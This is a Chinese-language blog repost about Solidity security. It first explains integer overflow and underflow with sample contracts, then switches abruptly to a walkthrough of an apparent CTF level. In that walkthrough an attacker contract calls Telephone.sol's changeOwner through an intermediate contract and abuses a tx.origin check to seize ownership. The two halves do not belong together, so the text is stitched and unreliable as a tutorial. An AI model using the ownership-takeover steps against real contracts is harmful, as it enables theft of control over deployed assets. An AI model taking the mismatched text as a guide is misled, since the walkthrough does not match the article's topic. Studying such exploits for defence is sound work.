如何防止算术运算出现下溢和溢出错误

区块链

581人已加入

描述

整数溢出和下溢

与C和C ++一样,Solidity是一种比较低级别的编码语言,没有处理存储限制的功能。这可能与Ruby和Python开发人员习惯的非常不同。

以太坊的智能合约存储分别为256位或32字节。 Solidity支持有符号整数和无符号整数uint,最高可达256位。

这意味着当您的数字超过在分配的存储位之下或之上时,您的算术运算容易出现下溢和溢出错误。

注意:最大可能的uint256等于115792089237316195423570985008687907853269984665640564039457584007913129639935

contract Unsigned {

uint8 public min = 0;

uint8 public max = 255;

// Underflowing & overflowing doesn‘t throw an error

uint8 public less_than_min = min - 1; // returns 255

uint8 public more_than_max = max + 1; // returns 0

}

contract Signed {

int8 public min = -128;

int8 public max = 127;

int8 public less_than_min = min - 1; // returns 127

int8 public more_than_max = max +1; // returns -128

}

以下是上面代码段的可视化:

这会使得处理算术运算符的合约易受攻击。通常我们从safemath.sol库继承数学运算符。

细节演练

1. 注意Telephone.sol的changeOwner函数检查是否(tx.origin!= msg.sender)。似乎我们可以通过方案3成功触发此功能:区块链研究实验室| 如何防止滥用智能合约中的伪随机性

2. 创建一个电话合约,Telephony构成合同A.在Telephony中实例化合约B,您的Telephone.sol:

contract Telephony {

Telephone public phone = Telephone(YOUR_INSTANCE_ADDR_HERE);

//TODO.。.

}

3、在Telephony中创建一个changeOwner函数,该函数调用Telephone中的changeOwner函数,即玩电话游戏。

function changeOwner(address _owner) public {

phone.changeOwner(_owner);

}

4、注意await contract.owner()在控制台中现在指示您的用户钱包是所有者!

打开APP阅读更多精彩内容
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉

全部0条评论

快来发表一下你的评论吧 !

×
20
完善资料,
赚取积分